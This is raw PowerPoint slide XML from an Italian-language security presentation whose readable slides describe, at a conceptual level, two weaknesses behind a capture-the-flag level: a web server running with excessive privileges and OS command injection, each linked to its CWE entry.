                    <a:pt x="7520" y="2238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7375" y="2383"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7251" y="2528"/>
                    <a:pt x="7230" y="2735"/>
                    <a:pt x="7313" y="2901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7520" y="3211"/>
                    <a:pt x="7644" y="3543"/>
                    <a:pt x="7727" y="3895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7769" y="4081"/>
                    <a:pt x="7955" y="4226"/>
                    <a:pt x="8141" y="4226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8349" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8349" y="5014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8141" y="5014"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7955" y="5014"/>
                    <a:pt x="7769" y="5138"/>
                    <a:pt x="7727" y="5345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7644" y="5676"/>
                    <a:pt x="7520" y="6029"/>
                    <a:pt x="7313" y="6319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7230" y="6484"/>
                    <a:pt x="7251" y="6712"/>
                    <a:pt x="7375" y="6836"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7520" y="6981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6961" y="7541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6816" y="7396"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6691" y="7251"/>
                    <a:pt x="6464" y="7230"/>
                    <a:pt x="6298" y="7334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6008" y="7520"/>
                    <a:pt x="5676" y="7665"/>
                    <a:pt x="5324" y="7748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5117" y="7789"/>
                    <a:pt x="4993" y="7955"/>
                    <a:pt x="4993" y="8162"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4993" y="8390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206" y="8390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4206" y="8183"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4206" y="7976"/>
                    <a:pt x="4081" y="7810"/>
                    <a:pt x="3874" y="7769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3522" y="7686"/>
                    <a:pt x="3191" y="7541"/>
                    <a:pt x="2901" y="7354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2735" y="7251"/>
                    <a:pt x="2507" y="7271"/>
                    <a:pt x="2383" y="7396"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2238" y="7541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679" y="7002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1824" y="6857"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1948" y="6712"/>
                    <a:pt x="1989" y="6505"/>
                    <a:pt x="1886" y="6339"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1699" y="6029"/>
                    <a:pt x="1554" y="5697"/>
                    <a:pt x="1471" y="5345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1430" y="5138"/>
                    <a:pt x="1244" y="5014"/>
                    <a:pt x="1057" y="5014"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="850" y="5014"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="850" y="4247"/>
                  </a:move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344;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE799478-DB54-435D-287B-9B60F603038D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1696047" y="2784661"/>
              <a:ext cx="94293" cy="94315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4371" h="4372" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1864" y="4371"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3542" y="4371"/>
                    <a:pt x="4371" y="2362"/>
                    <a:pt x="3190" y="1181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2009" y="1"/>
                    <a:pt x="0" y="850"/>
                    <a:pt x="0" y="2507"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3543"/>
                    <a:pt x="849" y="4371"/>
                    <a:pt x="1864" y="4371"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1864" y="1492"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2776" y="1492"/>
                    <a:pt x="3231" y="2590"/>
                    <a:pt x="2589" y="3232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="3853"/>
                    <a:pt x="849" y="3418"/>
                    <a:pt x="849" y="2507"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="849" y="1948"/>
                    <a:pt x="1305" y="1492"/>
                    <a:pt x="1864" y="1492"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1864" y="1492"/>
                  </a:move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345;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3257E0BE-1BD7-ECBB-82B4-5B7E89F17060}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1707200" y="2980841"/>
              <a:ext cx="58116" cy="20559"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2694" h="953" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2072" y="41"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="622" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="953"/>
                    <a:pt x="622" y="891"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2072" y="891"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2694" y="953"/>
                    <a:pt x="2694" y="0"/>
                    <a:pt x="2072" y="41"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2072" y="41"/>
                  </a:move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346;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A2D64C-A8A6-24A0-3074-04227E44C492}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1724199" y="3099684"/>
              <a:ext cx="21465" cy="21486"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="995" h="996" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="559" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="1"/>
                    <a:pt x="0" y="457"/>
                    <a:pt x="249" y="726"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="518" y="995"/>
                    <a:pt x="994" y="809"/>
                    <a:pt x="994" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="994" y="187"/>
                    <a:pt x="808" y="1"/>
                    <a:pt x="559" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="559" y="1"/>
                  </a:move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5067096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fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="0" end="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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="0" end="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4">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="53"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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360699" y="508998"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>VULNERABILITà IN LEVEL16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="344416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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>vulnerabilità</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> appena vista si verifica solo se diverse debolezze sono presenti e sfruttate contemporaneamente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>Debolezza #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Il Web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" err="1"/>
              <a:t>thttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> esegue con privilegi di esecuzione ingiustamente elevati, precisamente quelli di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>flag16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>CWE di riferimento: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>CWE-250 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>Unnecessary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1"/>
              <a:t>Privileges</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" u="sng">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/250.html</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231027195"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cove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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360699" y="508998"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>VULNERABILITà IN LEVEL16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="344416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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>vulnerabilità</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> appena vista si verifica solo se diverse debolezze sono presenti e sfruttate contemporaneamente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>Debolezza #2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Se un’applicazione Web, che esegue comandi, non neutralizza i caratteri speciali allora è possibile iniettare nuovi caratteri in cascata ai precedenti</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>CWE di riferimento: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>CWE-78 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Improper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Neutralization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t> of Special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Elements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t> in an OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t> (‘OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t> Injection’)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/78.html</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2279166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fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Google Shape;6010;p113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7169D0D-02CB-77E8-DB9F-26433857D816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="255546" y="2768029"/>
            <a:ext cx="469655" cy="428140"/>
            <a:chOff x="1508720" y="1289039"/>
            <a:chExt cx="469655" cy="428140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Google Shape;6011;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA113F4D-6384-2568-1FB2-65A408580CBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1510135" y="1660388"/>
              <a:ext cx="450908" cy="53198"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="20902" h="2466" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="20901" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="20901" y="1347"/>
                    <a:pt x="19783" y="2444"/>
                    <a:pt x="18436" y="2465"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2466" y="2465"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1099" y="2444"/>
                    <a:pt x="1" y="1347"/>
                    <a:pt x="1" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="20901" y="0"/>
                  </a:move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012;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AE6BB7-D1CD-D5C0-C9C6-1A0357CC016B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1544996" y="1412369"/>
              <a:ext cx="381186" cy="248041"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="17670" h="11498" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1616" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16054" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16945" y="22"/>
                    <a:pt x="17649" y="726"/>
                    <a:pt x="17670" y="1617"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="17670" y="11497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="11497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1617"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="726"/>
                    <a:pt x="726" y="22"/>
                    <a:pt x="1616" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1616" y="1"/>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013;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3304C466-BE20-B52C-3DA2-DF3637913341}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1632127" y="1301551"/>
              <a:ext cx="206923" cy="227482"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9592" h="10545" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2632" y="10544"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2445" y="8494"/>
                    <a:pt x="1" y="7769"/>
                    <a:pt x="1" y="4806"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2155"/>
                    <a:pt x="2134" y="1"/>
                    <a:pt x="4786" y="1"/>
